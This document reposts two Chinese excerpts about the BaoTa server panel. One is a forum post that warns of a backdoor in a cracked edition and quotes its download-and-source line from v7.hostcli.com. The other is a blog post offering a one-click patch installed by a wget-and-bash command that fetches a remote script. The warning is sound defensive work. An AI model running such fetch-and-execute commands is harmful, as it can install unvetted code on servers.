摘自:https://hostloc.com/thread-1015891-1-1.html
作者:bagheera
如何安全的使用宝塔
先来问一个问题, 为何要使用宝塔: 方便的安装配置环境, 管理站点.
以下建议满足上述基础需求,更高需求满足不了.
1, 免费版: 安装完需要的环境软件, 插件. 然后 ssh 里面 service bt stop, 就会停掉bt进程, 环境不受影响,cron类应该只有一个let证书续费,不会链接bt官网.
2, 收费版: service bt stop后,可能需要定期进后台用到 防护统计,访问统计等插件, 可以在使用时候 service bt start, 访问后台,用完再stop.
bt进程日常就不应该运行.
3,开心版hostcli: 食用方法和上述一致外, 此开心版还加了一个”远程执行后门”, 可以手动修改,删除掉代码,也可以使用.
后门文件在
/www/server/panel/script/check_files.py
删除掉最后三行,这三行是从他服务器上下载一个sh,然后执行这个sh, 目前访问这个地址返回空内容,后门可能随时启用
checkFile="/www/server/panel/install/check_bt_file.sh" wget -O ${checkFile} 'https://v7.hostcli.com/tools/check_bt_file.sh' . ${checkFile}
开心版只找到这一个后门, 里面还有没有不好说… 删掉这三行,再加上 service bt stop, 应该是安全的.
第三方插件内也可能存在远程执行代码, 原版和开心版都有可能, 可自行下载插件代码分析.
摘自:https://blog.cccyun.cn/post-431.html
作者:消失的彩虹海
自用的宝塔面板一键优化补丁
这个是自用的宝塔面板一键优化补丁,主要有以下优化项目:
1.去除宝塔面板强制绑定账号
2.去除各种删除操作时的计算题与延时等待
3.去除创建网站自动创建的垃圾文件(index.html、404.html、.htaccess)
4.关闭未绑定域名提示页面,防止有人访问未绑定域名直接看出来是用的宝塔面板
5.关闭活动推荐与在线客服
6.去除自动校验文件与上报信息定时任务
7.去除面板日志与网站绑定域名上报
wget -O optimize.sh http://f.cccyun.cc/bt/optimize.sh && bash optimize.sh
适用宝塔面板版本:7.7
全部使用补丁的方式,而不是替换文件的方式,方便后续升级版本的修改。
适用宝塔面板7.9版本的命令(7.9版本不支持去除强制绑定账号,新增去除面板首页广告):
wget -O optimize.sh http://f.cccyun.cc/bt/optimize_new.sh && bash optimize.sh
注意:此补丁可能导致安装第三方失败。